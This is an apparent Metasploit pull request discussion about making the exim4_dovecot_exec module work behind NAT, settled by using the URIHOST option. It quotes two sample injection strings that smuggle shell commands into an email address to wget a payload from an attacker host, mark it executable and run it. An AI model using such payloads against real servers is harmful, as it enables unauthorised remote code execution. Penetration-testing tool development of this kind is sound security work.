Support LHOST for metasploit behind NAT

[aushack]

This module (for unknown reasons) forces the use of SRVHOST which can be bound to the interface (e.g. 0.0.0.0). Unlike LHOST, which can use any string for a reverse payload but still binds to 0.0.0.0, this module doesn't work if using behind NAT because SRVHOST will bind to any, but the shell injection will use a non routable address. So I changed it to use LHOST (if set), so that the payload will use the msf IP address.

Before:
<LbE/usr/bin/wget${IFS}192.168.1.1/ZRBIdHUrJjByRY${IFS}-O${IFS}/tmp/pdadacylchmod${IFS}+x${IFS}/tmp/pdadacyl/tmp/pdadacyl@debian.localdomain>

After:
<LbE/usr/bin/wget${IFS}203.1.1.1/ZRBIdHUrJjByRY${IFS}-O${IFS}/tmp/pdadacylchmod${IFS}+x${IFS}/tmp/pdadacyl/tmp/pdadacyl@debian.localdomain>

[aushack]

Otherwise using SRVHOST like LHOST will fail:

Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (203.1.1.1:80)

[wchen-r7]

Hi @aushack, are you familiar with the URIHOST option? The URIHOST option's description explains that it is for tunneling purposes... perhaps more suitable for this instead of using the LHOST option? Please let me know what you think, thanks!

[wchen-r7]

We have changed it to: 7c396db

[wchen-r7]

Release Notes

The exploits/linux/smtp/exim4_dovecot_exec module now supports NAT with the URIHOST option.